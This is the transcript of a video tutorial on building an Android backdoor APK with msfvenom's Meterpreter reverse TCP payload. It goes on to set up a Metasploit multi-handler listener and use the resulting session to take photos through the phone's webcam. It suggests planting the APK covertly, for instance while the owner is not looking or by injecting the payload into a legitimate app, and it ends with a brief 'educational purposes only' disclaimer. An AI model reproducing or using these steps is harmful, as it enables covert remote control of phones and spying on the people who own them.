Hi, in this video I will show you how to make a backdoor APK for the Android. The objective for this one is to create a backdoor program in which when it is installed in an Android phone, it will run and communicate to the target to the hacker's machine using the IP address and the port that is set. So to do that, we will be using the MSF Venom. We'll type MSF Venom dash P so that we will load the payload, and our payload is Android Meterpreter Reverse TCP. Then we will have the L host. Our L host will be the hacker's computer. In this instance, this computer I am using. So we will check what is the IP of this one. That is 192.168.1.13. So lhost equals 192.168.1.13. Then we will also set the port 4444. You can use other port numbers. And then we will save the APK file, APK to a file. So R, then let's say I will call this one backdoor.apk. Okay, so now it has been built. Okay, and to check the APK file, we'll do ls. So it's here. So I will transfer to my other cell phone so that I can demonstrate it to you using this computer and then the cell phone that I will be using, and then how we can enable the camera to take pictures. Okay, so we will go back to our discussion. This is the APK that we created using our MSF Venom. Now, in our cell phone, we are able to install it or download it to our phone. Now, there are a lot of ways the hacker can do that. Maybe he has access to the device, and when the owner is not looking, he was able to put the application, or he can also create a legit app and inject the payload. So there are a lot of ways that he can do in order for him to put the APK on the cell phone. Now, on the hacker's computer, he can type he can run the MSF console so that he can start listening. In order for him to listen to the communication from the Android phone, you can do sudo msf console. We will run the Metasploit. We will be using the multi-handler module. But if you don't know the exact name of the module, you can search multi-handler. Okay, here, exploit multi-handler. So you can type use exploit multi-handler. Okay, so show options. Okay, So our payload is this one, which is generic. We can change that to our specific payload, which is Android Meterpreter Reverse TCP. Sorry. Set payload. Okay. Options again to see what are other things we need to set. So set lhost 192.168.1.13. Again, this lhost is the IP address of the computer that will be listening for any communication from the APK. Then for the L port, if you remember, we used the 444 when we created the APK using the MSF binom. So that stays. And now we will run. We'll type run and press enter. Then at this point, our computer is waiting for a communication from the. Okay, so while the computer is listening for any communication from the Android, we will go back here in our Android phone. We will install this one. This app may be harmful. Okay, so install anyway. Okay, then open. I'm using one hand to do this. Okay, so as you can see, we have here the Meterpreter session opened, meaning the computer can now communicate with the Android phone. So for example, the hacker can type help. You will see different commands. We are interested on this one, webcam list and webcam snap. We type webcam list and we will see the different cameras. So I have two front cameras because this is a phone wherein there's the second camera is a pop-up. And then I will type webcam snap, then choose the camera. I will choose one. You can see the camera was able to snap me. So I was able to demonstrate how we can create an APK with a payload used for backdoor, so that when the apps will be run on the Android phone, it will send a communication to the hacker's computer that is waiting for the communication. And from that, once there is a communication, then the hacker can manipulate the cell phone. In the demo earlier, I show you how the hacker can take pictures using the phone camera. Now, this is a demo for educational purposes only, and we are not allowed to do anything malicious to others' computer, except if it is our computer and we are doing it to learn more about the hacking technique, so that we will be able to avoid such things when hackers uh, attack us. So thank you for watching, and see you on my next video.